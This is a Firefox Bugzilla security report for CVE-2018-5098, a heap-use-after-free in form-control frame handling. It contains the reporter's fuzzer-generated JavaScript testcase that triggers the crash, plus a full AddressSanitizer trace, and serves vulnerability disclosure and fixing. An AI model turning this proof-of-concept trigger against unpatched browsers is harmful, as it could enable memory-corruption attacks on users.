Closed Bug 1399400 (CVE-2018-5098) Opened 7 years ago Closed 6 years ago

heap-use-after-free in nsGenericHTMLElement::GetFormControlFrame

Categories

(Core :: DOM: Core & HTML, defect, P1)

52 Branch
defect

Tracking


VERIFIED FIXED
mozilla59
Tracking Status
firefox-esr52 58+ verified
firefox57 --- wontfix
firefox58 + verified
firefox59 + fixed

People

(Reporter: nils, Assigned: mrbkap)

Details

(Keywords: csectype-uaf, regressionwindow-wanted, sec-high, Whiteboard: [fixwindow-wanted][adv-main58+][adv-esr52.6+][post-critsmash-triage])

Attachments

(4 files, 2 obsolete files)

The following testcase crashes the latest ASAN build of Firefox ESR 52.3.1 (BuildID=20170912172710). It requires the fuzzPriv extension to trigger reliably.

<script>
function start() {
	o0=document.createElement('iframe');
	document.body.appendChild(o0);
	o1=window.open('data:text/html,<div><div><div>','popup35','height=134');
	o1.onload=fun0;
}
function fun0(e) {
	o5=e.target;
	o1.onresize=fun2;
	tmp=o5.getElementsByTagName('*');
	o6=tmp[0];
	o7=tmp[1];
	o8=tmp[3];
	o15=document.createElement('input');
	o20=document.createElement('marquee');
	o20.addEventListener('DOMAttrModified',fun1);
	o8.appendChild(o20);
	o7.replaceWith(o15);
}
function fun1() {
	o15.type='number';
	o1.resizeTo(57,100);
	o5.removeChild(o6);
	o5.appendChild(o6);
	o15.select();
}
function fun2() {
	window.top.document.documentElement.appendChild(o15);
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==29513==ERROR: AddressSanitizer: heap-use-after-free on address 0x6150005339b0 at pc 0x7f51ef4b0479 bp 0x7ffdbbad88e0 sp 0x7ffdbbad88d8
READ of size 4 at 0x6150005339b0 thread T0
    #0 0x7f51ef4b0478 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12
    #1 0x7f51ef4b0478 in IsInUncomposedDoc /home/worker/workspace/build/src/dom/base/nsINode.h:526
    #2 0x7f51ef4b0478 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:916
    #3 0x7f51ef4b0478 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:964
    #4 0x7f51ef4b0478 in nsGenericHTMLElement::GetFormControlFrame(bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:1005
    #5 0x7f51ef3566ba in SelectAll /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3766:43
    #6 0x7f51ef3566ba in mozilla::dom::HTMLInputElement::Select() /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3724
    #7 0x7f51ef3563b7 in mozilla::dom::HTMLInputElement::Select() /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3688:14
    #8 0x7f51eea54770 in mozilla::dom::HTMLInputElementBinding::select(JSContext*, JS::Handle<JSObject*>, mozilla::dom::HTMLInputElement*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:2769:3
    #9 0x7f51eed10399 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
    #10 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #11 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #12 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #13 0x7f51f4e043ac in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #14 0x7f51f4dd39df in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #15 0x7f51f4de14cf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #16 0x7f51f4de3c7e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #17 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #18 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #19 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #20 0x7f51f507548f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #21 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #22 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #23 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #24 0x7f51f4b66b8d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #25 0x7f51ee6fcd6c in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #26 0x7f51ef0f43e2 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:64:12
    #27 0x7f51ef0f43e2 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1130
    #28 0x7f51ef0f5e57 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #29 0x7f51ef0e0e79 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:401:9
    #30 0x7f51ef0e4248 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #31 0x7f51ef0e6147 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:780:12
    #32 0x7f51ed2d18f1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1309:5
    #33 0x7f51ef07eb16 in mozilla::AsyncEventDispatcher::Run() /home/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:54:3
    #34 0x7f51ecdd918e in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5195:5
    #35 0x7f51ed1d4cf4 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:4795:3
    #36 0x7f51ef4eff8c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2424:3
    #37 0x7f51f0eab795 in ~mozAutoDocConditionalContentUpdateBatch /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:83:7
    #38 0x7f51f0eab795 in nsDOMCSSDeclaration::ParsePropertyValue(nsCSSPropertyID, nsAString_internal const&, bool) /home/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:319
    #39 0x7f51ed6b157b in SetMargin /home/worker/workspace/build/src/layout/style/nsCSSPropList.h:2474:1
    #40 0x7f51ed6b157b in mozilla::dom::CSS2PropertiesBinding::set_margin(JSContext*, JS::Handle<JSObject*>, nsDOMCSSDeclaration*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:24459
    #41 0x7f51eed0f75c in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2865:8
    #42 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #43 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #44 0x7f51f5096dc8 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #45 0x7f51f5096dc8 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:650
    #46 0x7f51f50fc26d in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2434:10
    #47 0x7f51f50fc26d in js::NativeSetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::QualifiedBool, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2469
    #48 0x7f51f4dad9a8 in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1540:12
    #49 0x7f51f4dad9a8 in js::SetPropertyIgnoringNamedGetter(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::PropertyDescriptor>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/BaseProxyHandler.cpp:182
    #50 0x7f51eed1a985 in mozilla::dom::DOMProxyHandler::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) const /home/worker/workspace/build/src/dom/bindings/DOMJSProxyHandler.cpp:258:10
    #51 0x7f51f4ddfc31 in js::Proxy::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:333:12
    #52 0x7f51f4cbdb9a in JSObject::nonNativeSetProperty(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/jsobj.cpp:1022:12
    #53 0x7f51f506e16f in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1539:16
    #54 0x7f51f506e16f in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:259
    #55 0x7f51f506e16f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2715
    #56 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #57 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #58 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #59 0x7f51f4b64922 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #60 0x7f51f058736b in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3310:14
    #61 0x7f51f058736b in nsXBLProtoImplAnonymousMethod::Execute(nsIContent*, JSAddonId*) /home/worker/workspace/build/src/dom/xbl/nsXBLProtoImplMethod.cpp:331
    #62 0x7f51f0550f1e in nsXBLBinding::ExecuteAttachedHandler() /home/worker/workspace/build/src/dom/xbl/nsXBLBinding.cpp:634:5
    #63 0x7f51f0550d1e in nsBindingManager::ProcessAttachedQueueInternal(unsigned int) /home/worker/workspace/build/src/dom/xbl/nsBindingManager.cpp:419:7
    #64 0x7f51f137ce69 in ProcessAttachedQueue /home/worker/workspace/build/src/dom/xbl/nsBindingManager.h:105:5
    #65 0x7f51f137ce69 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4175
    #66 0x7f51f108e9dc in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #67 0x7f51f109b221 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #68 0x7f51f109acb5 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:316:5
    #69 0x7f51f109d7de in applyImpl<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByValue<mozilla::TimeStamp> , 0> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #70 0x7f51f109d7de in apply<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #71 0x7f51f109d7de in mozilla::detail::RunnableMethodImpl<void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #72 0x7f51ea58149b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #73 0x7f51ea6035dc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #74 0x7f51eb3bc25f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #75 0x7f51eb32ddb8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #76 0x7f51eb32ddb8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #77 0x7f51eb32ddb8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #78 0x7f51f09c29af in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #79 0x7f51f2a3ff71 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #80 0x7f51f2bd7287 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #81 0x7f51f2bd89fd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #82 0x7f51f2bd98bc in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #83 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #84 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #85 0x7f5205fca82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #86 0x41ba88 in _start (/fuzzer3/esr/firefox/firefox+0x41ba88)

0x6150005339b0 is located 48 bytes inside of 496-byte region [0x615000533980,0x615000533b70)
freed by thread T0 here:
    #0 0x4b21db in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f51ea449f34 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:9
    #2 0x7f51ea449b26 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2840:3
    #3 0x7f51ea450bfe in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3826:3
    #4 0x7f51ea4500bc in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3651:9
    #5 0x7f51ea454136 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4144:3
    #6 0x7f51ed2ed6c9 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
    #7 0x7f51ece173bd in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1340:3
    #8 0x7f51ea5a9aa6 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
    #9 0x7f51ebdcec1e in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2058:12
    #10 0x7f51ebdcec1e in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1377
    #11 0x7f51ebdcec1e in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1344
    #12 0x7f51ebdd62a8 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1000:12
    #13 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #14 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #15 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #16 0x7f51f507548f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #17 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #18 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #19 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #20 0x7f51f4b64922 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #21 0x7f51ebcf65cf in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #23 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #24 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #25 0x7f51f507548f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #26 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #27 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #28 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #29 0x7f51f4e043ac in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7f51f4dd39df in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #31 0x7f51f4de14cf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #32 0x7f51f4de3c7e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #33 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #34 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #35 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #36 0x7f51f4b66b8d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12

previously allocated by thread T0 here:
    #0 0x4b24fb in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0ded in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f51ef3215a9 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f51ef3215a9 in NS_NewHTMLInputElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:129
    #4 0x7f51ef4c8456 in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:291:41
    #5 0x7f51ef4c8456 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:263
    #6 0x7f51ed226afe in nsIDocument::CreateHTMLElement(nsIAtom*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:12559:28
    #7 0x7f51f174853d in nsNumberControlFrame::MakeAnonymousElement(mozilla::dom::Element**, nsTArray<nsIAnonymousContentCreator::ContentInfo>&, nsIAtom*, mozilla::CSSPseudoElementType, nsStyleContext*) /home/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:333:35
    #8 0x7f51f174907b in nsNumberControlFrame::CreateAnonymousContent(nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:392:8
    #9 0x7f51f1197197 in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4228:17
    #10 0x7f51f1189b72 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10775:3
    #11 0x7f51f11a30a1 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4026:9
    #12 0x7f51f11ae196 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6196:3
    #13 0x7f51f118a8c4 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10640:5
    #14 0x7f51f118a8c4 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10852
    #15 0x7f51f11951ad in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11862:3
    #16 0x7f51f1191608 in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2625:5
    #17 0x7f51f11b4876 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7753:7
    #18 0x7f51f137f815 in PresShell::ContentInserted(nsIDocument*, nsIContent*, nsIContent*, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4427:3
    #19 0x7f51ed32d6de in nsNodeUtils::ContentInserted(nsINode*, nsIContent*, int) /home/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:201:3
    #20 0x7f51ed2d277e in nsINode::doInsertChildAt(nsIContent*, unsigned int, bool, nsAttrAndChildArray&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1630:7
    #21 0x7f51ed2d8ec6 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2514:14
    #22 0x7f51ed9ab98b in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1850:12
    #23 0x7f51ed9ab98b in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1854
    #24 0x7f51ed9ab98b in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle<JSObject*>, nsINode*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:696
    #25 0x7f51eed10399 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
    #26 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #27 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #28 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #29 0x7f51f4e043ac in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7f51f4dd39df in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
